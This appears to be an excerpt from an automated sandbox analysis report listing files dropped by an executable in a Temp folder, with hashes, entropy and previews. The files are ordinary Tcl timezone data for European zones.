                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8793
                                                                                                                                                                                                                                                    Entropy (8bit):3.6452802192723297
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Istanbul) {. {-9223372036854775808 6952 0 LMT}. {-2840147752 7016 0 IMT}. {-1869875816 7200 0 EET}. {-1693706400 10800 1 EEST}. {-1680490800 7200 0 EET}. {-1570413600 10800 1 EEST}. {-1552186800 7200 0 EET}. {-1538359200 10800 1 EEST}. {-1522551600 7200 0 EET}. {-1507514400 10800 1 EEST}. {-1490583600 7200 0 EET}. {-1440208800 10800 1 EEST}. {-1428030000 7200 0 EET}. {-1409709600 10800 1 EEST}. {-1396494000 7200 0 EET}. {-931140000 10800 1 EEST}. {-922762800 7200 0 EET}. {-917834400 10800 1 EEST}. {-892436400 7200 0 EET}. {-875844000 10800 1 EEST}. {-857358000 7200 0 EET}. {-781063200 10800 1 EEST}. {-764737200 7200 0 EET}. {-744343200 10800 1 EEST}. {-733806000 7200 0 EET}. {-716436000 10800 1 EEST}. {-701924400 7200 0 EET}. {-684986400 10800 1 EEST}. {-670474800 7200 0 EET}. {-654141600 10800 1 EEST}. {-639025200 7200 0 EET}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):176
                                                                                                                                                                                                                                                    Entropy (8bit):4.831245786685746
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Jersey) $TZData(:Europe/London).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2397
                                                                                                                                                                                                                                                    Entropy (8bit):3.872391899125256
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kaliningrad) {. {-9223372036854775808 4920 0 LMT}. {-2422056120 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 7200 0 CET}. {-778730400 10800 1 CEST}. {-762663600 7200 0 CET}. {-757389600 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7202
                                                                                                                                                                                                                                                    Entropy (8bit):3.6738341956502953
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kiev) {. {-9223372036854775808 7324 0 LMT}. {-2840148124 7324 0 KMT}. {-1441159324 7200 0 EET}. {-1247536800 10800 0 MSK}. {-892522800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-825382800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {638319600 14400 1 MSD}. {646786800 10800 1 EEST}. {686102400 7200 0 EET}. {701820000 10800 1 EEST}. {717541200 7200 0 EET}. {733269600 1
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):9471
Entropy (8bit):3.7395405211894532
Encrypted:false
SSDEEP:192:1MgVSz+IZHX68PlXIFj544IrvfMsbxZTH7qwQ:1MYSz+IZHX68PlYFUM8xZTH7qwQ
MD5:A38B1394DF3266B55823F763FA63A03C
SHA1:A8BD0F7613A59A0104ABA8958188D435CE71D273
SHA-256:354D9C1FCFBC0EBF19F563A2685CE1CBDCB5061089BBD301211477358CEEACF3
SHA-512:240BE4F7B1FB774D5557190ACC44DF702FC6AF772970F2B07626FB96A3B3FBC945C1BCF079EFDD7DB8A91BD8E30F11682B2A835F42FCB0782C7EC15989E78111
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Lisbon) {. {-9223372036854775808 -2205 0 LMT}. {-2713908195 -2205 0 LMT}. {-1830381795 0 0 WET}. {-1689555600 3600 1 WEST}. {-1677801600 0 0 WET}. {-1667437200 3600 1 WEST}. {-1647738000 0 0 WET}. {-1635814800 3600 1 WEST}. {-1616202000 0 0 WET}. {-1604365200 3600 1 WEST}. {-1584666000 0 0 WET}. {-1572742800 3600 1 WEST}. {-1553043600 0 0 WET}. {-1541206800 3600 1 WEST}. {-1521507600 0 0 WET}. {-1442451600 3600 1 WEST}. {-1426813200 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1221440400 3600 1 WEST}. {-1206925200 0 0 WET}. {-1191200400 3600 1 WEST}. {-1175475600 0 0 WET}. {-1127696400 3600 1 WEST}. {-1111971600 0 0 WET}. {-1096851600 3600 1 WEST}. {-1080522000
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):185
Entropy (8bit):4.901869793666386
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQavPSJ5QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vqm
MD5:5F2AEC41DECD9E26955876080C56B247
SHA1:4FDEC0926933AE5651DE095C519A2C4F9E567691
SHA-256:88146DA16536CCF587907511FB0EDF40E392E6F6A6EFAB38260D3345CF2832E1
SHA-512:B71B6C21071DED75B9B36D49EB5A779C5F74817FF070F70FEAB9E3E719E5F1937867547852052AA7BBAE8B842493FBC7DFAFD3AC47B70D36893541419DDB2D74
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade).
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):9839
Entropy (8bit):3.737361476589814
Encrypted:false
SSDEEP:192:Gj4y1xZfvm8nKrhFs3XRnRaQqTLJaMt/VZ1R6Y+:GjPxZfvmgEhS3XRmau/VZ1R6Y+
MD5:2A53A87C26A5D2AF62ECAAD8CECBF0D7
SHA1:025D31C1D32F1100C1B00858929FD29B4E66E8F6
SHA-256:2A69A7C9A2EE3057EBDB2615DBE5CB08F5D334210449DC3E42EA88564C29583A
SHA-512:81EFA13E4AB30A9363E80EC1F464CC51F8DF3C492771494F3624844E074BA9B84FE50EF6C32F9467E6DAB41BD5159B492B752D0C97F3CB2F4B698C04E68C0255
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/London) {. {-9223372036854775808 -75 0 LMT}. {-3852662325 0 0 GMT}. {-1691964000 3600 1 BST}. {-1680472800 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1507500000 3600 1 BST}. {-1490565600 0 0 GMT}. {-1473631200 3600 1 BST}. {-1460930400 0 0 GMT}. {-1442786400 3600 1 BST}. {-1428876000 0 0 GMT}. {-1410732000 3600 1 BST}. {-1396216800 0 0 GMT}. {-1379282400 3600 1 BST}. {-1364767200 0 0 GMT}. {-1348437600 3600 1 BST}. {-1333317600 0 0 GMT}. {-1315778400 3600 1 BST}. {-1301263200 0 0 GMT}. {-1284328800 3600 1 BST}. {-1269813600 0 0 GMT}. {-1253484000 3600 1 BST}. {-1238364000 0 0 GMT}. {-1221429600 3600 1 BST}. {-120
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):8826
Entropy (8bit):3.7634145613638657
Encrypted:false
SSDEEP:96:TYt4c9+dcVhv9HMLftvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAr:0w2h1QSTRNH4Mn82rlo6XIZ9ALeBO
MD5:804A17ED0B32B9751C38110D28EB418B
SHA1:24235897E163D33970451C48C4260F6C10C56ADD
SHA-256:00E8152B3E5CD216E4FD8A992250C46E600E2AD773EEDDD87DAD31012BE55693
SHA-512:53AFDDE8D516CED5C6CF0A906DBF72AF09A62278D1FC4D5C1562BBCE853D322457A6346C3DE8F112FCF665102E19A2E677972E941D0C80D0AB7C8DD0B694628E
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Luxembourg) {. {-9223372036854775808 1476 0 LMT}. {-2069713476 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1662343200 7200 1 CEST}. {-1650157200 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1612659600 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585519200 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552258800 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520550000 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490572800 0 0 WET}. {-1473642000 3600 1 WEST}. {-1459119600 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427673600 0 0 WET}. {-1411866000 3600 1 WEST}. {-1396224000 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364774400 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333324800 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301270400 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269813600 0 0 WET}. {-1253484000 3600 1 WEST}. {-
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):8282
Entropy (8bit):3.756812378817409
Encrypted:false
SSDEEP:96:kHB87tmDnTNSSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZY:oOMUSTRNH4Mn82rlo6XIZ9ALeBO
MD5:4BC0D203C28DF6DCB2C9595DFFA3E5C7
SHA1:0A592FFBD7703AF803BF7EDA96E7BE9A3551A72E
SHA-256:7F1EC4E7AC29B935823B0155CA07C1FE3092E7202EC0DE3F3CBD8FB9D5E795FB
SHA-512:B651AF5693A7A8F7816F526AB3AE0548F953AB49125E113F2C906CF9050F4F0ECF9F59F1CBDFC9E5E6F6FB5D46E7E1F9B7A5D2C8D270B7C32063355582393118
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Madrid) {. {-9223372036854775808 -884 0 LMT}. {-2177451916 0 0 WET}. {-1661734800 3600 1 WEST}. {-1648429200 0 0 WET}. {-1631926800 3600 1 WEST}. {-1616893200 0 0 WET}. {-1601254800 3600 1 WEST}. {-1585357200 0 0 WET}. {-1442451600 3600 1 WEST}. {-1427677200 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1029114000 3600 1 WEST}. {-1017622800 0 0 WET}. {-1002848400 3600 1 WEST}. {-986173200 0 0 WET}. {-969238800 3600 1 WEST}. {-954118800 0 0 WET}. {-940208400 3600 1 WEST}. {-873079200 7200 1 WEMT}. {-862538400 3600 1 WEST}. {-842839200 7200 1 WEMT}. {-828237600 3600 1 WEST}. {-811389600 7200 1 WEMT}. {-796010400 3600 1 WEST}. {-779940000 7200 1 WEMT}. {-765421200 3
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):8425
Entropy (8bit):3.7277252681393933
Encrypted:false
SSDEEP:96:wpTw6hpNqX5vln3mcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0c:wL0JvlJRNH4Mn82rlo6XIZ9ALeBO
MD5:B6E871EFFA21231DA8D2B45401F09011
SHA1:4766A6C2B75F3B739E9D0418F56163D529AF9DEF
SHA-256:9D766E6E252EA2F30811661549B3359A351C42C6558793DCD4919B55A23DE632
SHA-512:29E146CAAE7E3F289015405809410FA56C52C472812F5579A8907DF4E09292D4ED200E75F13850A8CE740FB4FD840A629FEA7F3398C60E7A8E8D8A317C8C49CA
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Malta) {. {-9223372036854775808 3484 0 LMT}. {-2403478684 3600 0 CET}. {-1690851600 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1664758800 7200 1 CEST}. {-1649034000 3600 0 CET}. {-1635123600 7200 1 CEST}. {-1616979600 3600 0 CET}. {-1604278800 7200 1 CEST}. {-1585530000 3600 0 CET}. {-1571014800 7200 1 CEST}. {-1555290000 3600 0 CET}. {-932432400 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-766717200 3600 0 CET}. {-750898800 7200 1 CEST}. {-733359600 3600 0 CET}. {-719456400 7200 1 CEST}. {-701917200 3600 0 CET}. {-689209200 7200 1 CEST}. {-670460400 3600 0 CET}. {-114051600 7200 1 CEST}. {-103168800 3600 0 CET}. {-81997200 7200 1 CEST}. {-71719200 3600 0 CET}. {-50547600 7200 1 CEST}. {-40269600 3600 0 CET}
Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
File Type:ASCII text
Category:dropped
Size (bytes):185
Entropy (8bit):4.913470013356756
Encrypted:false
SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxV1AYKjGyVAIgoq2AYKjvCW6yQausWILMFJ8QarAYKa:SlSWB9IZaM3ymrAdjGyVAIgorAdjoyGK
MD5:CFB0DE2E11B8AF400537BD0EF493C004
SHA1:32E8FCB8571575E9DFE09A966F88C7D3EBCD183E
SHA-256:5F82A28F1FEE42693FD8F3795F8E0D7E8C15BADF1FD9EE4D45794C4C0F36108C
SHA-512:9E36B2EACA06F84D56D9A9A0A83C7C106D26A6A55CBAA696729F105600F5A0105F193899D5996C416EFAABC4649E91BA0ED90D38E8DF7B305C6D951A31C80718
Malicious:false
Reputation:unknown
Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Helsinki)]} {. LoadTimeZoneFile Europe/Helsinki.}.set TZData(:Europe/Mariehamn) $TZData(:Europe/Helsinki).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2101
                                                                                                                                                                                                                                                    Entropy (8bit):3.8482528522046273
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:K6ccjMsJ2JoJrZiuRVV0Qv3LEevBFoBGrjI9q1F008bBJd6:PRjMAyurZTV/DYtXY
                                                                                                                                                                                                                                                    MD5:BD2AF72A8710DEB99D0FE90CB8977536
                                                                                                                                                                                                                                                    SHA1:1EBDD2374BC2BBCF98F4DE2D2EEFC0BEA3AC1A0D
                                                                                                                                                                                                                                                    SHA-256:540390E01FBB22ABC2BFF3CE6AB511D64A65E383DD0AB2C62944E6721311E22D
                                                                                                                                                                                                                                                    SHA-512:7446C71DE2893133C5A429035C1EAEFCD97D7ED25FE4428B53AA9F60872B4C2952D9862FFDC00A23A7AA94FB20A8A74DB99157A2700D67241E080177F60284C5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Minsk) {. {-9223372036854775808 6616 0 LMT}. {-2840147416 6600 0 MMT}. {-1441158600 7200 0 EET}. {-1247536800 10800 0 MSK}. {-899780400 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-804646800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {670374000 10800 1 EEST}. {686102400 7200 0 EET}. {701820000 10800 1 EEST}. {71754480
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8871
                                                                                                                                                                                                                                                    Entropy (8bit):3.7700564621466666
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:2LCV8tXttpD72RXbvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHT/:eAYt+STRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:B2BA91B2CDD19E255B68EA35E033C061
                                                                                                                                                                                                                                                    SHA1:246E377E815FFC11BBAF898E952194FBEDAE9AA2
                                                                                                                                                                                                                                                    SHA-256:768E3D45DB560777C8E13ED9237956CFE8630D840683FAD065A2F6948FD797BE
                                                                                                                                                                                                                                                    SHA-512:607383524C478F1CB442679F6DE0964F8916EE1A8B0EF6806BDF7652E4520B0E842A611B432FB190C30C391180EA1867268BBBF6067310F70D5E72CB3E4D789F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Monaco) {. {-9223372036854775808 1772 0 LMT}. {-2486680172 561 0 PMT}. {-1855958961 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1470618000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1253494800 3600 1 WEST}. {-1238374800 0 0
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2347
                                                                                                                                                                                                                                                    Entropy (8bit):3.859338482250319
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cYedmnClADEFFkebUe9zUe9h7+UeGH3UeRUeIuUeKqCbUeaJJUevTkUetUeibEUL:kmnAAEF7vxJ2JoJrprXnECL9yLI0vjls
                                                                                                                                                                                                                                                    MD5:F7899615C684D6AA466FE558EBF5AD1E
                                                                                                                                                                                                                                                    SHA1:B78B12669C92C496D2397D9753C42812149BF283
                                                                                                                                                                                                                                                    SHA-256:4D58AFD1250A70E292066705194876DC9C4A688FD76B89AE488093F06E3E49E2
                                                                                                                                                                                                                                                    SHA-512:DA9F09C770A234E2F4E156956819B808DA45CF0FB3831E4EE64FF6FC699C5EDD321BA79083AA10F921BFDCB9708DD973BB1E7CDF29D70B64D21E14D90BFB15BA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Moscow) {. {-9223372036854775808 9017 0 LMT}. {-2840149817 9017 0 MMT}. {-1688265017 9079 0 MMT}. {-1656819079 12679 1 MST}. {-1641353479 9079 0 MMT}. {-1627965079 16279 1 MDST}. {-1618716679 12679 1 MST}. {-1596429079 16279 1 MDST}. {-1593822679 14400 0 MSD}. {-1589860800 10800 0 MSK}. {-1542427200 14400 1 MSD}. {-1539493200 18000 1 MSM}. {-1525323600 14400 1 MSD}. {-1491188400 7200 0 EET}. {-1247536800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.73570159193188
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq85GKLWVAIgNwMGKLG6yQatHefeWFKYGKL1:SlSWB9IZaM3yZdLWVAIgGMdL9y3HefeW
                                                                                                                                                                                                                                                    MD5:47C275C076A278CA8E1FF24E9E46CC22
                                                                                                                                                                                                                                                    SHA1:55992974C353552467C2B57E3955E4DD86BBFAD2
                                                                                                                                                                                                                                                    SHA-256:34B61E78EF15EA98C056C1AC8C6F1FA0AE87BD6BC85C58BE8DA44D017B2CA387
                                                                                                                                                                                                                                                    SHA-512:1F74FC0B452C0BE35360D1C9EC8347063E8480CA37BE893FD4FF7FC2279B7D0C0909A26763C7755DFB19BE9736340D3FB00D39E9F6BF23C1D2F0015372139847
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Nicosia)]} {. LoadTimeZoneFile Asia/Nicosia.}.set TZData(:Europe/Nicosia) $TZData(:Asia/Nicosia).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7651
                                                                                                                                                                                                                                                    Entropy (8bit):3.7309855254369766
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:aG6sT+cQJWxdocRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQt:abcQJWxd/RNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:2A3F771DD9EAE2E9C1D8394C12C0ED71
                                                                                                                                                                                                                                                    SHA1:541DCF144EFFE2DFF27B81A50D245C7385CC0871
                                                                                                                                                                                                                                                    SHA-256:8DDFB0296622E0BFDBEF4D0C2B4EA2522DE26A16D05340DFECA320C0E7B2B1F7
                                                                                                                                                                                                                                                    SHA-512:E1526BD21E379F8B2285481E3E12C1CF775AE43E205D3E7E4A1906B87821D5E15B101B24463A055B6013879CD2777112C7F27B5C5220F280E3C48240367AA663
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Oslo) {. {-9223372036854775808 2580 0 LMT}. {-2366757780 3600 0 CET}. {-1691884800 7200 1 CEST}. {-1680573600 3600 0 CET}. {-927511200 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-765327600 3600 0 CET}. {-340844400 7200 1 CEST}. {-324514800 3600 0 CET}. {-308790000 7200 1 CEST}. {-293065200 3600 0 CET}. {-277340400 7200 1 CEST}. {-261615600 3600 0 CET}. {-245890800 7200 1 CEST}. {-230166000 3600 0 CET}. {-214441200 7200 1 CEST}. {-198716400 3600 0 CET}. {-182991600 7200 1 CEST}. {-166662000 3600 0 CET}. {-147913200 7200 1 CEST}. {-135212400 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {40185
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8838
                                                                                                                                                                                                                                                    Entropy (8bit):3.7637328221887567
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:1XV8tXttpD724lvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIu:1FYtPSTRNH4Mn82rlo6XIZ9ALeBO
                                                                                                                                                                                                                                                    MD5:153CA0EF3813D91C5E23B34ADFE7A318
                                                                                                                                                                                                                                                    SHA1:F7F18CB34424A9B62172F00374853F1D4A89BEE4
                                                                                                                                                                                                                                                    SHA-256:092BF010A1CF3819B102C2A70340F4D67C87BE2E6A8154716241012B5DFABD88
                                                                                                                                                                                                                                                    SHA-512:E2D418D43D9DFD169238DDB0E790714D3B88D16398FA041A9646CB35F24EF79EE48DA4B6201E6A598E89D4C651F8A2FB9FB874B2010A51B3CD35A86767BAF4D2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
